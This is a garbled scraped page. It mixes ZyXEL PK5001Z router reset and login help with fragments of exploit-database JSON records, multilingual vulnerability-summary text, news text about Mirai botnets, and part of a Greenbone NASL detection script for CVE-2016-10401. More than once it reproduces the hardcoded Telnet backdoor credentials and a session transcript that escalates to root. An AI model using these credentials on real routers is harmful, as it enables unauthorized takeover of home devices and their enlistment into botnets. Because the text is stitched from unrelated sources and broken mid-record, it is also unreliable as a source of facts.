Setup instructions, pairing guide, and how to reset. \n# Linked CVE's: CVE-2016-10401 \n \n \nHardcoded password for ZyXEL PK5001Z Modem, login with the following credentials via Telnet \n \nusername: admin \npassword: CenturyL1nk \n \nEscalate to root with 'su' and this password. You must need basic knowledge about computer and browser to reset ZyXEL PK5001Z CenturyLink router with Web-based configuration utility. If you cannot remember the router’s username and password or your login credentials stop working, you must reset your ZyXEL router. Now, I want to set up a home network and have no … L'attaque peut être lancée à distance. Techniczne szczegóły, jak również publiczny exploit są znane. CVSS Meta Temp Score. Check the FAQ, read the documentation or contact us! Disable Remote Management through Telnet:** Go into your router\u2019s settings and disable remote management protocol, specifically through Telnet, as this is a protocol used to allow one computer to control another from a remote location. Błąd został odkryty w dniu 2016-01-20. All data on this page is shared under the license CC BY-NC-SA 4.0. Click to share on WhatsApp (Opens in new window), Click to share on Twitter (Opens in new window), Click to share on Facebook (Opens in new window), Click to share on Pinterest (Opens in new window), Click to share on LinkedIn (Opens in new window), Click to share on Reddit (Opens in new window), Click to share on Tumblr (Opens in new window), Click to share on Pocket (Opens in new window), Click to share on Telegram (Opens in new window), Click to share on Skype (Opens in new window), Click to email this to a friend (Opens in new window), ZyXEL PK5001Z CenturyLink Reset with Button, Reset via Web-Based Configuration Utility, Login Details for ZyXEL PK5001Z CenturyLink, Download Android Multi Tools Latest Version, Flash Tools : Best Tools to Flash Android Phone, Android Tools and Drivers - Android Multi Tools. Copyright © 2020 Zyxel Communications Corp. All rights reserved. Currently, there are several variants of the Mirai botnet attacking IoT devices. Reset delete all internet or and wireless settings on your device (IP addresses, DNS details, WiFi password, etc). \r\n# Linked CVE's: CVE-2016-10401\r\n \r\n \r\nHardcoded password for ZyXEL PK5001Z Modem, login with the following credentials via Telnet\r\n \r\nusername: admin\r\npassword: CenturyL1nk\r\n \r\nEscalate to root with 'su' and this password.\r\n\r\npassword: zyad5001\r\n\r\n\r\n[root:/]# telnet\r\nTrying\r\nConnected to\r\nEscape character is '^]'.\r\n\r\nPK5001Z login: admin\r\nPassword: CenturyL1nk\r\n$ whoami\r\nadmin_404A03Tel\r\n$ su\r\nPassword: zyad5001\r\n# whoami\r\nroot\r\n# uname -a\r\nLinux PK5001Z #54 Wed Oct 14 11:17:48 CST 2015 mips unknown\r\n# cat /etc/zyfwinfo\r\nVendor Name: ZyXEL Communications Corp.\r\n\r\n\r\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "packetstorm": [{"lastseen": "2017-11-03T14:05:30", "description": "", "published": "2017-11-02T00:00:00", "type": "packetstorm", "title": "ZyXEL PK5001Z Modem Backdoor Account", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10401"], "modified": "2017-11-02T00:00:00", "id": "PACKETSTORM:144851", "href": "", "sourceData": "`# Exploit Title: ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root Telnet Password. Remote exploit for Hardware platform", "published": "2017-10-31T00:00:00", "type": "exploitdb", "title": "ZyXEL PK5001Z Modem - Backdoor Account", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10401"], "modified": "2017-10-31T00:00:00", "id": "EDB-ID:43105", "href": "", "sourceData": "# Exploit Title: ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root Telnet Password.\r\n# Google Dork: n/a\r\n# Date: 2017-10-31\r\n# Exploit Author: Matthew Sheimo\r\n# Vendor Homepage:\r\n# Software Link: n/a\r\n# Version: PK5001Z\r\n# Tested on: Linux\r\n# About: ZyXEL PK5001Z Modem is used by Century Link a global communications and IT services company focused on connecting its customers to the power of the digital world. ZyXEL PK5001Z CenturyLink IP, Username and Password. The default password is blank. Problemem dotknięta jest nieznana funkcja. \n \nThe biggest threat of having the source code of any malware in public is that it could allow attackers to upgrade it with newly disclosed exploits according to their needs and targets. No comments yet. Check the FAQ, read the documentation or contact us! "ZyXEL PK5001Z devices have zyad5001 as the su (superuser) password, which makes it easier for remote attackers to obtain root access if a non-root account password is known (or a non-root default account exists within an ISP's deployment of these devices)," the vulnerability description reads. It is a ZyXEL Pk5001Z and has both the modem and router together. 8.3. This is the simplest way to reset the ZyXEL PK5001Z CenturyLink WiFi router. Zyxel has conducted a thorough investigation and identified that the reported attacks only affect PK5001Z since the hardcoded credential disclosed in CVE-2016-10401 only exists on PK5001Z. © 1997-2020 by Hope it helps. Set up was pretty easy and everything worked fine except I have one computer connected to the Wifi and can't get any of the other computers connected via Wi-Fi. All routers have this Reset button. (Means there is no password for ZyXEL router). After that, Router will automatically reboot. It will only change all settings (Like IP addresses and DNS etc) back to factory defaults. $0-$5k: 0.00: W ZyXEL PK5001Z (Router Operating System) została stwierdzona podatność. \n \nPK5001Z login: admin \nPassword: CenturyL1nk \n$ whoami \nadmin_404A03Tel \n$ su \nPassword: zyad5001 \n# whoami \nroot \n# uname -a \nLinux PK5001Z #54 Wed Oct 14 11:17:48 CST 2015 mips unknown \n# cat /etc/zyfwinfo \nVendor Name: ZyXEL Communications Corp. \n \n`\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "threatpost": [{"lastseen": "2019-01-23T05:28:12", "bulletinFamily": "info", "cvelist": ["CVE-2016-10401"], "description": "Qihoo 360 Netlab researchers reported on Friday that they are tracking an uptick in botnet activity associated with a variant of Mirai. Find the default login, username, password, and ip address for your ZyXEL router. [iot-botnet](](
)\n\n \nMirai-based attacks experienced sudden rise after someone publicly released its[ source code]() in October 2016. Verify that your router is currently turned on and plugged into a power source. Cette vulnérabilité a été classée comme 0-day non publique pendant au moins 552 jours. Factory resetting the router will erase all changes you made to the router. It is important to note that other Zyxel … This is the simplest way to reset the ZyXEL PK5001Z CenturyLink WiFi router. \n\n\n> \"ZyXEL PK5001Z devices have zyad5001 as the su (superuser) password, which makes it easier for remote attackers to obtain root access if a non-root account password is known (or a non-root default account exists within an ISP\u2019s deployment of these devices),\" the vulnerability description reads.\n\nMirai is the same IoT botnet malware that knocked major Internet companies offline last year by launching massive [DDoS attacks against Dyndns](), crippling some of the world's biggest websites, including Twitter, Netflix, Amazon, Slack, and Spotify. Uważa się go za proof-of-concept. The router will restart and it will take few seconds to complete the reset. Description. Zyxel PK5001Z that used hardcoded credential made it possible for remote attackers to login and obtain root access via Telnet if Telnet remote console was enabled and default login credential remained unchanged. Nie są znane żadne środki zaradcze. edit json xml. After factory reset, I think you can find default user account and password on device back label. Most routers have a web interface. Anyway, attackers have discovered that there’s a large amount of ZyXEL devices are using admin/CentryL1nk and admin/QwestM0dem as default Telnet credentials. Change Default Passwords for your connected devices:** If you own any internet-connected device at home or work, change its default credentials. You cannot update any security settings unless you know the username and password and access the router’s configuration utility. \n\n\n> \"For an attacker that finds a new IoT vulnerability, it would be easy to incorporate it into the already existing Mirai code, thus releasing a new variant,\" Dima Beckerman, security researcher at Imperva, told The Hacker News.\n\n> \"Mirai spread itself using default IoT devices credentials. Please note: Resetting the ZyXEL router does not reset the firmware to an earlier version. Still, we can\u2019t know for sure what other changes were implemented into the code. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"\");\n script_version(\"2019-09-06T14:17:49+0000\");\n script_cve_id(\"CVE-2016-10401\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_name(\"ZyXEL Modems Backup Telnet Account and Default Root Credentials\");\n script_tag(name:\"last_modification\", value:\"2019-09-06 14:17:49 +0000 (Fri, 06 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-11-02 09:19:00 +0200 (Thu, 02 Nov 2017)\");\n script_category(ACT_ATTACK);\n script_family(\"Default Accounts\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"telnetserver_detect_type_nd_version.nasl\", \"gb_default_credentials_options.nasl\");\n script_require_ports(\"Services/telnet\", 23);\n script_mandatory_keys(\"telnet/zyxel/modem/detected\");\n script_exclude_keys(\"default_credentials/disable_default_account_checks\");\n\n script_xref(name:\"URL\", value:\"\");\n script_xref(name:\"URL\", value:\"\");\n script_xref(name:\"URL\", value:\"\");\n script_xref(name:\"URL\", value:\"\");\n\n script_tag(name:\"summary\", value:\"ZyXEL PK5001Z and C1100Z modems have default root credentials set and a backdoor account with hard-coded credentials.\");\n\n script_tag(name:\"impact\", value:\"This issue may be exploited by a remote attacker to gain full\n access to sensitive information or modify system configuration.\");\n\n script_tag(name:\"vuldetect\", value:\"Connect to the telnet service and try to login with default credentials.\");\n\n script_tag(name:\"solution\", value:\"It is recommended to disable the telnet access and change the backup and default credentials.\");\n\n script_tag(name:\"insight\", value:\"In February 2018 it was discovered that this vulnerability is being exploited by the\n 'DoubleDoor' Internet of Things (IoT) Botnet.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n exit(0);\n}\n\nif(get_kb_item(\"default_credentials/disable_default_account_checks\"))\n exit(0);\n\ninclude(\"\");\ninclude(\"\");\ninclude(\"\");\n\nport = telnet_get_port( default:23 );\nbanner = telnet_get_banner( port:port );\nif( !
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